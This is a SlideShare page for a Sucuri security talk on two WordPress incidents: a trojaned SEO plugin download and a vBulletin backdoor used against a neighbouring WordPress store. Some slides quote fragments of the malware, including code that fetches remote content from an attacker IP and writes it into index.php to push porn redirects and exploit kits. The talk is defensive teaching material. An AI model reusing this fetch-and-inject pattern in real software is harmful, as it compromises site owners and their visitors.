SlideShare uma empresa Scribd logo

WordPress Security - Learning From Hacks

Transferir como PPTX, PDF
Tony Perez
Tony Perez
EducaçãoTecnologiaNegócios
1 de 37
WordPress Security Learning From Website Hacks
This is me! Sucuri Inc. Website Security o Incident Handling o Log Analysis o o Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Let’s Learn from Website Attacks Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack Scenerios o The Art of Phishing o Stealing Credit Cards Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio Uno (One) The art of Phishing Naive Users
Attack of Opportunity o Holiday season / Holiday spirit o Did you say Free? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Red Flag[s] <A href="http://www.[infecteddomain].com.au/wp -content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A> Red Alert: http://www.[infecteddomain].com.au Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Difference o o Pro Version? Legit Version? Modified file: aioseop_class.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Intent o Redirection - porn or exploit kits o Target: index.php o Taking content from here: $code_txt = 'http://91.239.15.61/o1.txt’; o Placing it in the files here: $index_path = $path.'/index.php'; if(file_put_contents($index_path, $code)){ Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
How? o Index.php payload: o Using curl to pull content from here: $url = http://91.239.15.61/java/google.php; Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Payload o Pulls content from: http://91.239.15.61/google.js - Redirection to Porn Sites http://91.239.15.61/g.php - Exploit Kits Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Lesson to Be Learned o Trust but verify sources o This is not isolated to just plugins, it can happen to themes as well o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant! o The vulnerability was the website administrator… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio Dos (Two) Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
Got e-Commerce? o Business owners <3 E-commerce o CMS extensibility = WooCommerce o Quick setup of payment collection systems for goods o Awesome, right? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Big Target o Credit Card = Cha-Ching o Used/shared/sold underground o Impact is catastrophic o Blacklisting o Ban o No more cash flow! No more Trust! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Cross-contamination Simple concept in which your website is attacked and infected by a neighboring site in the same environment Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
vBulletin o Popular CMS Application for Forums o WordPress + vBulletin Configurations Common Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio o WordPress: Main website | Blog | e-Commerce o vBulletin: Forum o 1 Server Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Payload Found here: /wp-admin/includes/list.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
How? o It’s about the journey folks… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio o list.php? o shop.txt? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
That’s Interesting /forum/ajax.php?edit= Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
vBulletin Plugin o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Dump of Users Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack Vector o Access Control Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Lessons to be Learned o Attackers are smart – surprise!!! o Cross-contamination is a real threat today! o Must be diligent across our stack! o Isolate applications if possible. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
What can you do? Lets get proactive!
Harsh Reality None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips.. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Two Important Vectors o Access control o Within your control… o Software vulnerabilities o Not so much… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Defense in Depth • There is no single cure • Layered Defenses • Combination of tools and actions – Combine: Protection and Detection Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Access Control o Google Authenticator – 2FA o http://wordpress.org/plugins/google-authenticator/ o Duo Security – 2FA o http://wordpress.org/plugins/duo-wordpress/ o Login Secure Solutions – Policy / Enforcement o http://wordpress.org/plugins/login-security-solution/ o Sucuri CloudProxy / Detection / Remedation - Complete Website Security o http://sucuri.net/signup Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Software Vulnerabilities o Trusted Sources o Start with the repo and established communities o If you’re not a developer this is going to be beyond your reach mostly o Web Application Firewall (WAF) Plugins o Highly ineffective, evading and bypassing is easy o Cause Denial of Service attacks o SaaS based Web Application Firewall (WAF) more effective! o Sucuri CloudProxy WAF Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Auditing • Know what is going on with your site – Integrity Checks – Logging in / Logging out – Changes being made • More important than half the hardening tips you read on line today • Options: – WP Security Audit log http://wordpress.org/plugins/wp-securityaudit-log/ – Sucuri Premium Plugin http://wordpress.sucuri.net Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
If all else fails… o Be sure you have backups… o VaultPress – WordPress Sites o Sucuri Backups – WordPress and Everything else o SaaS based Backups more effective! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Tony Perez @perezbox | @sucuri_security tony@sucuri.net #wordsesh Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox

Recomendados

WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityTony Perez
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?Tony Perez
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureTony Perez
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTony Perez
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good PostureTony Perez
 
Steps to Keep Your Site Clean
Steps to Keep Your Site CleanSteps to Keep Your Site Clean
Steps to Keep Your Site CleanSucuri
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersTony Perez
 
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit Guide
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri Webinar: WAF (Firewall) and CDN Feature Benefit Guide
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri
 

Recomendados

WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityTony Perez
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?Tony Perez
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureTony Perez
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTony Perez
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good PostureTony Perez
 
Steps to Keep Your Site Clean
Steps to Keep Your Site CleanSteps to Keep Your Site Clean
Steps to Keep Your Site CleanSucuri
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersTony Perez
 
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit Guide
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri Webinar: WAF (Firewall) and CDN Feature Benefit Guide
Sucuri Webinar: WAF (Firewall) and CDN Feature Benefit GuideSucuri
 
Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Sucuri
 
Sucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri
 
Sucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri
 
Sucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri
 
Sucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri
 
Sucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri
 
Sucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri
 
Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri
 
WCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightWCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightMaurizio Pelizzone
 
Sucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri
 
WordPress Hardening v4
WordPress Hardening v4WordPress Hardening v4
WordPress Hardening v4Maurizio Pelizzone
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri
 
Secure wordpress site
Secure wordpress siteSecure wordpress site
Secure wordpress sitefirojkhansahu
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteDeola Kayode
 
Why Do Hackers Hack?
Why Do Hackers Hack?Why Do Hackers Hack?
Why Do Hackers Hack?Sucuri
 
Webinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecurityWebinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecuritySucuri
 
What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?Sucuri
 
WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014sabinovates
 
Sucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri
 
Best Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentBest Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentPerficient, Inc.
 
Accelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzureAccelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzurePerficient, Inc.
 

Mais conteúdo relacionado

Mais procurados

Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Sucuri
 
Sucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri
 
Sucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri
 
Sucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri
 
Sucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri
 
Sucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri
 
Sucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri
 
Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri
 
WCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightWCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightMaurizio Pelizzone
 
Sucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri
 
Secure wordpress site
Secure wordpress siteSecure wordpress site
Secure wordpress sitefirojkhansahu
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteDeola Kayode
 
Why Do Hackers Hack?
Why Do Hackers Hack?Why Do Hackers Hack?
Why Do Hackers Hack?Sucuri
 
Webinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecurityWebinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecuritySucuri
 
What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?Sucuri
 
WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014sabinovates
 
Sucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri
 

Mais procurados (20)

Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?Kludges and PHP. Why Should You Use a WAF?
Kludges and PHP. Why Should You Use a WAF?
 
Sucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight ItSucuri Webinar: What is SEO Spam and How to Fight It
Sucuri Webinar: What is SEO Spam and How to Fight It
 
Sucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get Hacked
 
Sucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento WebsiteSucuri Webinar: How to Clean a Hacked Magento Website
Sucuri Webinar: How to Clean a Hacked Magento Website
 
Sucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website SpeedSucuri Webinar: How Caching Options Can Impact Your Website Speed
Sucuri Webinar: How Caching Options Can Impact Your Website Speed
 
Sucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital MarketersSucuri Webinar: Website Security Primer for Digital Marketers
Sucuri Webinar: Website Security Primer for Digital Marketers
 
Sucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's APISucuri Webinar: Leveraging Sucuri's API
Sucuri Webinar: Leveraging Sucuri's API
 
Sucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! websiteSucuri Webinar: How to identify and clean a hacked Joomla! website
Sucuri Webinar: How to identify and clean a hacked Joomla! website
 
Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016Sucuri Webinar: Hacked Website Trend Report Q1/2016
Sucuri Webinar: Hacked Website Trend Report Q1/2016
 
WCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at nightWCEU 2016 - 10 tips to sleep better at night
WCEU 2016 - 10 tips to sleep better at night
 
Sucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sitesSucuri Webinar: How to clean hacked WordPress sites
Sucuri Webinar: How to clean hacked WordPress sites
 
WordPress Hardening v4
WordPress Hardening v4WordPress Hardening v4
WordPress Hardening v4
 
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics ReportsSucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
Sucuri Webinar: Defending Your Google Brand Reputation and Analytics Reports
 
Secure wordpress site
Secure wordpress siteSecure wordpress site
Secure wordpress site
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press website
 
Why Do Hackers Hack?
Why Do Hackers Hack?Why Do Hackers Hack?
Why Do Hackers Hack?
 
Webinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri SecurityWebinar: Personal Online Privacy - Sucuri Security
Webinar: Personal Online Privacy - Sucuri Security
 
What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?What Are the Most Common Types of Hacks?
What Are the Most Common Types of Hacks?
 
WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014WP Security - Master Class #SMWLagos2014
WP Security - Master Class #SMWLagos2014
 
Sucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online StoreSucuri Webinar: Simple Steps To Secure Your Online Store
Sucuri Webinar: Simple Steps To Secure Your Online Store
 

Destaque

Best Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentBest Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentPerficient, Inc.
 
Accelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzureAccelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzurePerficient, Inc.
 
Avaya aura 6.x technical overview
Avaya aura 6.x technical overviewAvaya aura 6.x technical overview
Avaya aura 6.x technical overviewMotty Ben Atia
 
Microsoft azure platforms
Microsoft azure platformsMicrosoft azure platforms
Microsoft azure platformsMotty Ben Atia
 
Avaya One-X Mobile SIP for Apple iOS by PacketBase
Avaya One-X Mobile SIP for Apple iOS by PacketBaseAvaya One-X Mobile SIP for Apple iOS by PacketBase
Avaya One-X Mobile SIP for Apple iOS by PacketBasePacketBase, Inc.
 
Avaya VoIP on Cisco Best Practices by PacketBase
Avaya VoIP on Cisco Best Practices by PacketBaseAvaya VoIP on Cisco Best Practices by PacketBase
Avaya VoIP on Cisco Best Practices by PacketBasePacketBase, Inc.
 

Destaque (6)

Best Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya EnvironmentBest Practices for Integrating Lync with Your Avaya Environment
Best Practices for Integrating Lync with Your Avaya Environment
 
Accelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft AzureAccelerate Sitecore DevOps on Microsoft Azure
Accelerate Sitecore DevOps on Microsoft Azure
 
Avaya aura 6.x technical overview
Avaya aura 6.x technical overviewAvaya aura 6.x technical overview
Avaya aura 6.x technical overview
 
Microsoft azure platforms
Microsoft azure platformsMicrosoft azure platforms
Microsoft azure platforms
 
Avaya One-X Mobile SIP for Apple iOS by PacketBase
Avaya One-X Mobile SIP for Apple iOS by PacketBaseAvaya One-X Mobile SIP for Apple iOS by PacketBase
Avaya One-X Mobile SIP for Apple iOS by PacketBase
 
Avaya VoIP on Cisco Best Practices by PacketBase
Avaya VoIP on Cisco Best Practices by PacketBaseAvaya VoIP on Cisco Best Practices by PacketBase
Avaya VoIP on Cisco Best Practices by PacketBase
 

Semelhante a WordPress Security - Learning From Hacks

How to Secure your WordPress Website - WordCamp UK 2014
How to Secure your WordPress Website - WordCamp UK 2014How to Secure your WordPress Website - WordCamp UK 2014
How to Secure your WordPress Website - WordCamp UK 2014Primary Image Ltd
 
Responsible [digital] Home Ownership
Responsible [digital] Home OwnershipResponsible [digital] Home Ownership
Responsible [digital] Home OwnershipDenise (Dee) Teal
 
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...Benedek Menesi
 
You Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedYou Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedJoe McCray
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Comment pirater le site de mon concurrent.. et securiser le mien
Comment pirater le site de mon concurrent.. et securiser le mienComment pirater le site de mon concurrent.. et securiser le mien
Comment pirater le site de mon concurrent.. et securiser le mienJulien Dereumaux
 
Word press security 101
Word press security 101 Word press security 101
Word press security 101 Kojac801
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMECasey Ellis
 
IT Security - TestArmy
IT Security - TestArmy IT Security - TestArmy
IT Security - TestArmy TestArmy
 
Securing your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupSecuring your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupOyster Bay Marauders LLC
 
PHP SA 2013 - The weak points in our PHP projects
PHP SA 2013 - The weak points in our PHP projectsPHP SA 2013 - The weak points in our PHP projects
PHP SA 2013 - The weak points in our PHP projectsxsist10
 
So you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howSo you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howJoe McCray
 
Brighttalk learning to cook- network management recipes - final
Brighttalk learning to cook- network management recipes - finalBrighttalk learning to cook- network management recipes - final
Brighttalk learning to cook- network management recipes - finalAndrew White
 

Semelhante a WordPress Security - Learning From Hacks (20)

How to Secure your WordPress Website - WordCamp UK 2014
How to Secure your WordPress Website - WordCamp UK 2014How to Secure your WordPress Website - WordCamp UK 2014
How to Secure your WordPress Website - WordCamp UK 2014
 
Pubcon Vegas Session - WordPress Site Security Audits
Pubcon Vegas Session - WordPress Site Security AuditsPubcon Vegas Session - WordPress Site Security Audits
Pubcon Vegas Session - WordPress Site Security Audits
 
Responsible [digital] Home Ownership
Responsible [digital] Home OwnershipResponsible [digital] Home Ownership
Responsible [digital] Home Ownership
 
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
Office365 from a hacker's perspective: Real life Threats, Tactics and Remedie...
 
You Spent All That Money And Still Got Owned
You Spent All That Money And Still Got OwnedYou Spent All That Money And Still Got Owned
You Spent All That Money And Still Got Owned
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
Comment pirater le site de mon concurrent.. et securiser le mien
Comment pirater le site de mon concurrent.. et securiser le mienComment pirater le site de mon concurrent.. et securiser le mien
Comment pirater le site de mon concurrent.. et securiser le mien
 
Word press security 101
Word press security 101 Word press security 101
Word press security 101
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
 
IT Security - TestArmy
IT Security - TestArmy IT Security - TestArmy
IT Security - TestArmy
 
Cyber Security for Financial Institutions
Cyber Security for Financial InstitutionsCyber Security for Financial Institutions
Cyber Security for Financial Institutions
 
Which plugins rule the world?
Which plugins rule the world? Which plugins rule the world?
Which plugins rule the world?
 
WordPress security
WordPress securityWordPress security
WordPress security
 
Securing your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupSecuring your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP Meetup
 
PHP SA 2013 - The weak points in our PHP projects
PHP SA 2013 - The weak points in our PHP projectsPHP SA 2013 - The weak points in our PHP projects
PHP SA 2013 - The weak points in our PHP projects
 
So you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you howSo you wanna be a pentester - free webinar to show you how
So you wanna be a pentester - free webinar to show you how
 
Protect your website
Protect your websiteProtect your website
Protect your website
 
Brighttalk learning to cook- network management recipes - final
Brighttalk learning to cook- network management recipes - finalBrighttalk learning to cook- network management recipes - final
Brighttalk learning to cook- network management recipes - final
 

Mais de Tony Perez

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersTony Perez
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and SecurityTony Perez
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationTony Perez
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for WebsitesTony Perez
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceTony Perez
 
Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsTony Perez
 
Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Tony Perez
 
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityWordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityTony Perez
 
Joomla! Day Atlanta 2014 - Website Security - The Basics
